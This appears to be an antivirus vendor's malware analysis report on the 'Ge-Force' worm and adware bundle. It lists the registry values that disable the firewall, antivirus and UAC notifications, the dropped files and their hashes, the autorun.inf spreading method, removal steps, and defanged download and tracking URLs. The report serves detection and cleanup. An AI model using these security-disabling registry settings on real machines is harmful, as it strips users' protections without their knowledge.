[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "144"

"21507363" = "0"
"28676484" = "35"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 11 4A 0A 6F 3A B0 B9 41 F5 E0 2F F6 BF 6A BE"

[HKCU\Software\Aas]
"a2_0" = "7005"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas]
"a4_0" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

The process mscorsvw.exe:172 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"

The process Ge-Force-bg.exe:2632 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 47 B3 F2 5A 84 9B 30 E9 C3 A5 17 05 08 53 FC"

Dropped PE files

MD5	File path
0fb8fdff654dea1444a1733cfb79149d	c:\Program Files\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe
e19b738b235ea40fc075f8627c5472b9	c:\Program Files\Ge-Force\Ge-Force-bg.exe
11ccef28d3bfd871ab173a7e03f57b04	c:\Program Files\Ge-Force\Ge-Force-bho.dll
303913dad1bffa0af8c207f29489f336	c:\Program Files\Ge-Force\Ge-Force-buttonutil.dll
ce4ccca778189fef1de87a66f21ac3e1	c:\Program Files\Ge-Force\Ge-Force-buttonutil.exe
26461d0b7a6729c1263bc94a65753246	c:\Program Files\Ge-Force\Ge-Force-codedownloader.exe
e63daa30be43031462b6a86267431b9c	c:\Program Files\Ge-Force\Uninstall.exe
5981f7b76df711e10c552db4ca62ab0a	c:\Program Files\Ge-Force\utils.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
Ge-Force-codedownloader.exe:2504
Ge-Force-codedownloader.exe:2564
regsvr32.exe:2416
Khtmovq.exe:664
%original file name%.exe:1616
mscorsvw.exe:172
Ge-Force-bg.exe:2632
Delete the original Worm file.
Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\184[1].js (25 bytes)
%Program Files%\Ge-Force\utils.exe (86583 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (35246 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (415 bytes)
%Program Files%\Ge-Force\Ge-Force.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\288[1].js (551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (1 bytes)
%Program Files%\Ge-Force\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\337[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (3312 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\262[1].js (25 bytes)
%Program Files%\Ge-Force\Ge-Force-codedownloader.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (141808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (784 bytes)
%Program Files%\Ge-Force\Ge-Force-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (5 bytes)
%Program Files%\Ge-Force\Ge-Force-bg.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (410 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB7.tmp (662466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\356[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\350[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (997 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (31281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\91[1].js (86817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (1552 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (14 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\ipgeoapi[1] (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\app_code[1].js (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\desktop.ini (67 bytes)
%Program Files%\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe (7726 bytes)
%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0014C62D_Rar\%original file name%.exe (99596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (419460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (2426 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: Idzcf & co.
Product Name: Id-Eqhowiozunlmy
Product Version:
Legal Copyright: Copyright Vylorzwjeixeou
Legal Trademarks: Eqhowiozunlmy is a trademark of Kuoyj
Original Filename:
Internal Name:
File Version: 15.4.13.18
File Description: Teocxdjqh
Comments: comment on Khtmovq
Language: Language Neutral

Company Name: Idzcf & co.Product Name: Id-EqhowiozunlmyProduct Version: Legal Copyright: Copyright VylorzwjeixeouLegal Trademarks: Eqhowiozunlmy is a trademark of KuoyjOriginal Filename: Internal Name: File Version: 15.4.13.18File Description: TeocxdjqhComments: comment on KhtmovqLanguage: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	34108	34304	4.23004	63bb1ab888510a64d453326c977db871
.data	40960	144	512	0.831186	28f29d4150b83e7faae233a71c5cab15
.rdata	45056	9272	9728	3.95241	f652035f54b3a74c89f7bb1cb907d4d2
.bss	57344	297092	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	356352	4868	5120	3.6057	0d5c3df1017a50cd5a6baab82c884d87
.ndata	364544	770048	8192	0	0829f71740aab1ab98b33eae21dee122
.rsrc	1134592	69632	69120	5.50093	8fe4bd36b5bf2022d4edfda2dd0e3192

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://ipgeoapi.com/	23.21.123.184
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409
hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/356.js?ver=1&rnd=41
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/193.js?ver=9&rnd=41
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/262.js?ver=2&rnd=41
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/288.js?ver=1&rnd=41
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/350.js?ver=1&rnd=41
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/337.js?ver=1&rnd=41
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/184.js?ver=11&rnd=41
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/91.js?ver=118&rnd=41
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509
hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425
hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403
hxxp://logs.newstatsclientcloud.com/monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403	69.16.175.10
hxxp://js.newstatsclientcloud.com/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431	69.16.175.10
hxxp://js.newstatsdemosrv.com/plugins/mins/356.js?ver=1&rnd=41	69.16.175.10
hxxp://js.newstatsdemosrv.com/plugins/mins/350.js?ver=1&rnd=41	69.16.175.10
hxxp://js.newstatsdemosrv.com/plugins/mins/193.js?ver=9&rnd=41	69.16.175.10
hxxp://stats.newstatsclientcloud.com/installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409	54.231.32.196
hxxp://js.newstatsdemosrv.com/plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437	69.16.175.10
hxxp://logs.newstatsclientcloud.com/monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403	69.16.175.10
hxxp://stats.newstatsclientcloud.com/apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425	54.231.32.196
hxxp://js.newstatsdemosrv.com/plugins/mins/288.js?ver=1&rnd=41	69.16.175.10
hxxp://stats.newstatsclientcloud.com/stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909	54.231.32.196
hxxp://js.newstatsdemosrv.com/plugins/mins/91.js?ver=118&rnd=41	69.16.175.10
hxxp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521	69.16.175.10
